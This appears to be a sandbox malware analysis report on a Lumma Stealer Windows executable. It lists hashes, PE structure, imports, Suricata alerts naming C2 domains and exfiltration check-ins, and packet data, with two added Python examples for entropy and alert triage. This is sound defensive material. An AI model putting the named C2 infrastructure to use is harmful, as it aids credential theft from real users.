Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670911" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.296044963860531
Encrypted:false
SSDEEP:6144:I41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+uXmBMZJh1VjY:l1/YCW2AoQ0Ni0XwMHrVc
MD5:AF963ED77CE978B8D7C9127D93054295
SHA1:D818F1443D06B885A6FF59A4BACB7B01C846CCC9
SHA-256:184A265BE36C686394A314F2A78F0E3468A61EB43CC157FF288626F05DB587FD
SHA-512:FF8B09D8F0514124381B1771E9ED29F1D2615BCDFD5F8609DFED4A7F5FD15114451F20858384A4D927CBFBB70DBAD087950E8450234820DDF86264059D41702D
Malicious:false
Reputation:low
Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.MM..c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................$Y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.322975046936911
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:xNuh0DUJaG.exe
File size:332'800 bytes
MD5:9b3e0c8c483f0708b9dc9c18ce46d0bc
                                                                                                                                                                                                                                      SHA1:fd95369082e2b869b184391aa9268fa64370f4a7
                                                                                                                                                                                                                                      SHA256:4cf2d30c19e0ff537140c8717e72a8eb54a19ba9c27ce45adc7c790fc51d0549
                                                                                                                                                                                                                                      SHA512:b996764d4daa6d83adac62f22702bae686640a76a8665889928e9c161ae3c7af6dde6bf251e6b0122640c30e7f0506106d6bc68c2f19c604e1b447ff6e3ff9c0
                                                                                                                                                                                                                                      SSDEEP:6144:FYIPLkXwRx2Wfz58rgFLnJ06tf5jt+kEpYLgOh210M/bwQ8:FnwXwRMJgFTJ0G0kEJOhDMsd
                                                                                                                                                                                                                                      TLSH:D464013234A3C470E95B84719C21D7A07A3FB8B1A565425B33683F6E2E707D94AF931E
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r...6.k.6.k.6.k.....7.k.(.....k.(...(.k.(...L.k..Q..5.k.6.j.C.k.(...7.k.(...7.k.(...7.k.Rich6.k.................PE..L...U..d...
                                                                                                                                                                                                                                      Icon Hash:7151452951425053
                                                                                                                                                                                                                                      Entrypoint:0x405eb5
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x64B7CB55 [Wed Jul 19 11:39:01 2023 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:aacf07d3d4ac7a5415783f64b2fa492d
                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      call 00007FD808F68D94h
                                                                                                                                                                                                                                      jmp 00007FD808F6550Eh
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      call 00007FD808F656CCh
                                                                                                                                                                                                                                      xchg cl, ch
                                                                                                                                                                                                                                      jmp 00007FD808F656B4h
                                                                                                                                                                                                                                      call 00007FD808F656C3h
                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                      jmp 00007FD808F656ABh
                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                      mov ch, cl
                                                                                                                                                                                                                                      xor cl, cl
                                                                                                                                                                                                                                      jmp 00007FD808F656A1h
                                                                                                                                                                                                                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                      fpatan
                                                                                                                                                                                                                                      or cl, cl
                                                                                                                                                                                                                                      je 00007FD808F65696h
                                                                                                                                                                                                                                      fldpi
                                                                                                                                                                                                                                      fsubrp st(1), st(0)
                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                      je 00007FD808F65694h
                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                      fld st(0), st(0)
                                                                                                                                                                                                                                      fld st(0), st(0)
                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                      fsubrp st(1), st(0)
                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                      faddp st(1), st(0)
                                                                                                                                                                                                                                      fmulp st(1), st(0)
                                                                                                                                                                                                                                      ftst
                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                      fstsw word ptr [ebp-000000A0h]
                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                      test byte ptr [ebp-0000009Fh], 00000001h
                                                                                                                                                                                                                                      jne 00007FD808F65697h
                                                                                                                                                                                                                                      xor ch, ch
                                                                                                                                                                                                                                      fsqrt
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      pop eax
                                                                                                                                                                                                                                      jmp 00007FD808F6651Fh
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      fld tbyte ptr [0044407Ah]
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      or cl, cl
                                                                                                                                                                                                                                      je 00007FD808F6569Dh
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      fldpi
                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                      je 00007FD808F65694h
                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      fldz
                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                      je 00007FD808F65689h
                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      jmp 00007FD808F664F5h
                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                      mov cl, ch
                                                                                                                                                                                                                                      jmp 00007FD808F65692h
                                                                                                                                                                                                                                      call 00007FD808F6565Eh
                                                                                                                                                                                                                                      jmp 00007FD808F66500h
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                      add esp, FFFFFD30h
                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                      fstcw word ptr [ebp+00000000h]
                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                      • [C++] VS2008 build 21022
                                                                                                                                                                                                                                      • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                      • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                      • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                      • [RES] VS2008 build 21022
                                                                                                                                                                                                                                      • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x42a2c | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4d000 | 0x8b28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4720 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x17c | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x422c0 | 0x42400 | b9b54c14c4866d91c8272a7bb17d1601 | False | 0.8795364091981132 | data | 7.808585135243993 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x44000 | 0x86e4 | 0x6000 | d6ec3889671ff840615f69563950a50e | False | 0.0806884765625 | data | 0.9444213169263626 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4d000 | 0xbb28 | 0x8c00 | 85bfb984b59a1dac851eac1473d18b7f | False | 0.42564174107142855 | data | 4.66844461404238 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x532b0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.26439232409381663
RT_CURSOR | 0x54158 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.3686823104693141
RT_CURSOR | 0x54a00 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.49060693641618497
RT_ICON | 0x4d3c0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Romanian | Romania | 0.43150319829424305
RT_ICON | 0x4e268 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Romanian | Romania | 0.5537003610108303
RT_ICON | 0x4eb10 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Romanian | Romania | 0.5852534562211982
RT_ICON | 0x4f1d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Romanian | Romania | 0.6148843930635838
RT_ICON | 0x4f740 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Romanian | Romania | 0.4447095435684647
RT_ICON | 0x51ce8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Romanian | Romania | 0.49343339587242024
RT_ICON | 0x52d90 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Romanian | Romania | 0.524822695035461
RT_STRING | 0x551b0 | 0x63e | data | Romanian | Romania | 0.4311639549436796
RT_STRING | 0x557f0 | 0x338 | data | Romanian | Romania | 0.4696601941747573
RT_ACCELERATOR | 0x53260 | 0x50 | data | Romanian | Romania | 0.8125
RT_GROUP_CURSOR | 0x54f68 | 0x30 | data | | | 0.9166666666666666
RT_GROUP_ICON | 0x531f8 | 0x68 | data | Romanian | Romania | 0.6826923076923077
RT_VERSION | 0x54f98 | 0x218 | data | | | 0.5223880597014925
DLL | Import
KERNEL32.dll | InterlockedIncrement, EnumCalendarInfoW, GetCurrentProcess, InterlockedCompareExchange, WriteConsoleInputA, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, LoadLibraryW, SetCommConfig, SwitchToFiber, GetConsoleAliasExesLengthW, GetVersionExW, FindNextVolumeW, GetAtomNameW, GetModuleFileNameW, FindNextVolumeMountPointW, GetShortPathNameA, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, CreateJobSet, LoadLibraryA, InterlockedExchangeAdd, EnumDateFormatsA, SetLocaleInfoW, FindNextFileW, OpenEventW, ReadConsoleInputW, GetCurrentProcessId, OpenFileMappingA, EnumSystemLocalesW, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, HeapFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, CloseHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, RaiseException, GetModuleHandleA, SetStdHandle, RtlUnwind, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
Language of compilation system | Country where language is spoken
Romanian | Romania
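The section table above is the static evidence behind the "Detected unpacking" signatures: .text is executable, 0x42400 raw bytes, and has an entropy of 7.81 bits per byte, far above what compiled code normally shows, while .data sits at 0.94. The following is an added example, not Joe Sandbox's or the sample's own code, that reproduces that check with the Python standard library: it walks a PE's section headers, computes Shannon entropy per section, and reports executable sections above a threshold. The PE it analyses is constructed in build_sample_pe() with assumed layout values (section names, alignments, sizes); it is parseable but not a loadable image.

```python
"""Added example (not Joe Sandbox code): flag packed code sections in a PE by
section entropy. Sample PE and all layout constants are constructed assumptions."""
import math
import random
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

SECTION_HEADER = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Walk e_lfanew -> COFF header -> section headers; one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        (name, vsize, va, raw_size, raw_ptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from(SECTION_HEADER, pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]   # slicing tolerates truncated files
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_size": raw_size,
            "characteristics": chars,
            "entropy": shannon_entropy(raw),
        })
    return sections


def packed_code_sections(sections, threshold: float = 7.0):
    """Names of executable sections at or above the entropy threshold.

    Compiled x86 code usually lands near 6 bits/byte; 7.0+ on an executable
    section is the usual sign of a packer stub in front of encrypted code.
    """
    exec_bits = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE
    return [s["name"] for s in sections
            if s["characteristics"] & exec_bits and s["entropy"] >= threshold]


def build_sample_pe() -> bytes:
    """Constructed PE32 with three sections (assumed layout, not a real binary)."""
    rng = random.Random(1)
    encrypted = bytes(rng.getrandbits(8) for _ in range(0x4000))   # stand-in for packed code
    text_like = (b"Microsoft Visual C++ Runtime Library\0" * 200)[:0x1000]
    specs = [
        (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, encrypted),
        (b".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ, text_like),
        (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, b"\0" * 0x2000),
    ]
    file_align, sect_align, opt_size = 0x200, 0x1000, 224
    headers = 0x40 + 4 + 20 + opt_size + 40 * len(specs)
    hdr_end = -(-headers // file_align) * file_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    table, body, va, raw_ptr = bytearray(), bytearray(), 0x1000, hdr_end
    for name, chars, data in specs:
        raw_size = -(-len(data) // file_align) * file_align
        table += struct.pack(SECTION_HEADER, name.ljust(8, b"\0"), len(data), va,
                             raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += data.ljust(raw_size, b"\0")
        va += -(-raw_size // sect_align) * sect_align
        raw_ptr += raw_size
    head = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return head.ljust(hdr_end, b"\0") + bytes(body)


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
        print(f"{s['name']:<8} va=0x{s['va']:x} raw=0x{s['raw_size']:x} entropy={s['entropy']:.2f}")
    print("packed code candidates:", packed_code_sections(secs))
```

Run against the real sample, parse_sections(open(path, "rb").read()) would report .text at roughly 7.81 and .data below 1, matching the table; the threshold of 7.0 is a triage heuristic, not proof, since a section holding large compressed resources or certificate blobs scores similarly, which is why the check is restricted to sections marked executable.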
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T07:48:32.441646+0100 | 2059088 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) | 1 | 192.168.2.10 | 51184 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.453201+0100 | 2059051 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) | 1 | 192.168.2.10 | 53181 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.465985+0100 | 2059041 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) | 1 | 192.168.2.10 | 61213 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.480487+0100 | 2059035 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) | 1 | 192.168.2.10 | 50081 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.490806+0100 | 2059039 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) | 1 | 192.168.2.10 | 58750 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.501329+0100 | 2059057 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) | 1 | 192.168.2.10 | 63928 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.512095+0100 | 2059037 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) | 1 | 192.168.2.10 | 62827 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.522301+0100 | 2059043 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) | 1 | 192.168.2.10 | 50661 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.532793+0100 | 2059049 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) | 1 | 192.168.2.10 | 61203 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:33.213889+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49706 | 104.102.49.254 | 443 | TCP
2025-01-11T07:48:33.974147+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.10 | 49706 | 104.102.49.254 | 443 | TCP
2025-01-11T07:48:34.606386+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49708 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:35.051514+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.10 | 49708 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:35.051514+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49708 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:35.696742+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49714 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:36.204096+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.10 | 49714 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:36.204096+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49714 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:37.383901+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49725 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:38.017404+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.10 | 49725 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:38.663034+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49734 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:40.133319+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49743 | 104.21.80.1 | 443 | TCP
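The alert table above mixes three kinds of evidence: nine DNS-lookup signatures that each name a C2 domain (defanged in the signature text with a space before the TLD), severity-1 TLS-layer hits against the hosts the sample then talked to, and severity-3 JA3 fingerprint matches that corroborate but identify nothing on their own. The following is an added example, not part of the Joe Sandbox report, that performs that separation over Suricata EVE JSON, which is what the same sensor would write to eve.json. The records in SAMPLE_EVE are constructed to mirror rows of the table (field names follow Suricata's alert schema); the interleaved flow record shows why event_type must be filtered.

```python
"""Added example (not from the Joe Sandbox report): turn Suricata EVE alerts
into deduplicated indicators. SAMPLE_EVE is constructed from the table above."""
import json
import re
from collections import Counter

# Constructed EVE records mirroring the alert table (not a captured log).
SAMPLE_EVE = """\
{"timestamp":"2025-01-11T07:48:32.441646+0100","event_type":"alert","src_ip":"192.168.2.10","src_port":51184,"dest_ip":"1.1.1.1","dest_port":53,"proto":"UDP","alert":{"signature_id":2059088,"signature":"ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)","severity":1}}
{"timestamp":"2025-01-11T07:48:32.453201+0100","event_type":"alert","src_ip":"192.168.2.10","src_port":53181,"dest_ip":"1.1.1.1","dest_port":53,"proto":"UDP","alert":{"signature_id":2059051,"signature":"ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)","severity":1}}
{"timestamp":"2025-01-11T07:48:33.213889+0100","event_type":"alert","src_ip":"192.168.2.10","src_port":49706,"dest_ip":"104.102.49.254","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2025-01-11T07:48:35.051514+0100","event_type":"alert","src_ip":"192.168.2.10","src_port":49708,"dest_ip":"104.21.80.1","dest_port":443,"proto":"TCP","alert":{"signature_id":2054653,"signature":"ET MALWARE Lumma Stealer CnC Host Checkin","severity":1}}
{"timestamp":"2025-01-11T07:48:36.204096+0100","event_type":"alert","src_ip":"192.168.2.10","src_port":49714,"dest_ip":"104.21.80.1","dest_port":443,"proto":"TCP","alert":{"signature_id":2054653,"signature":"ET MALWARE Lumma Stealer CnC Host Checkin","severity":1}}
{"timestamp":"2025-01-11T07:48:37.383901+0100","event_type":"alert","src_ip":"192.168.2.10","src_port":49725,"dest_ip":"104.21.80.1","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2025-01-11T07:48:38.017404+0100","event_type":"flow","src_ip":"192.168.2.10","dest_ip":"104.21.80.1","proto":"TCP"}
"""

# "(skidjazzyric .click)": a label followed by one or more ".tld" parts, each
# optionally preceded by the defanging space ET uses inside signature names.
DEFANGED_DOMAIN = re.compile(r"\(([a-z0-9-]+(?: ?\.[a-z0-9-]+)+)\)", re.I)


def refang(domain: str) -> str:
    """'skidjazzyric .click' -> 'skidjazzyric.click'."""
    return domain.replace(" .", ".").lower()


def parse_eve(text: str):
    """Yield alert records only; eve.json interleaves flow, dns and tls events."""
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("event_type") == "alert":
            yield rec


def triage(text: str, max_severity: int = 1):
    """Return (c2_domains, c2_endpoints, hits_per_sid).

    c2_domains:    refanged domains named by DNS-lookup signatures.
    c2_endpoints:  (dest_ip, dest_port) of other alerts at or above max_severity,
                   i.e. the hosts actually contacted after resolution.
    hits_per_sid:  alert count per signature id, JA3 noise included, so the
                   analyst can still see how much corroboration there was.
    """
    domains, endpoints, per_sid = set(), set(), Counter()
    for rec in parse_eve(text):
        alert = rec["alert"]
        per_sid[alert["signature_id"]] += 1
        if alert["severity"] > max_severity:
            continue   # Suricata severity 1 is highest; JA3 hits are severity 3
        m = DEFANGED_DOMAIN.search(alert["signature"])
        if m and "DNS Lookup" in alert["signature"]:
            domains.add(refang(m.group(1)))
        elif rec["proto"] == "TCP":
            endpoints.add((rec["dest_ip"], rec["dest_port"]))
    return sorted(domains), sorted(endpoints), dict(per_sid)


if __name__ == "__main__":
    doms, eps, sids = triage(SAMPLE_EVE)
    print("block these domains:", doms)
    print("hunt for these endpoints:", eps)
    print("hits per SID:", sids)
```

The endpoint list is kept apart from the domain list on purpose: 104.21.80.1 and 104.102.49.254 are CDN edge addresses shared with unrelated legitimate sites, so they belong in a hunt query keyed on the TLS SNI or JA3, not in a firewall rule, whereas the nine DNS-lookup domains in the table are the blockable indicators.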
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 07:48:32.557876110 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:32.557919025 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:32.557981968 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:32.560060024 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:32.560071945 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.213824034 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.213888884 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:33.218413115 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
Jan 11, 2025 07:48:33.218426943 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.218729019 CET | 443 | 49706 | 104.102.49.254 | 192.168.2.10
Jan 11, 2025 07:48:33.267222881 CET | 49706 | 443 | 192.168.2.10 | 104.102.49.254
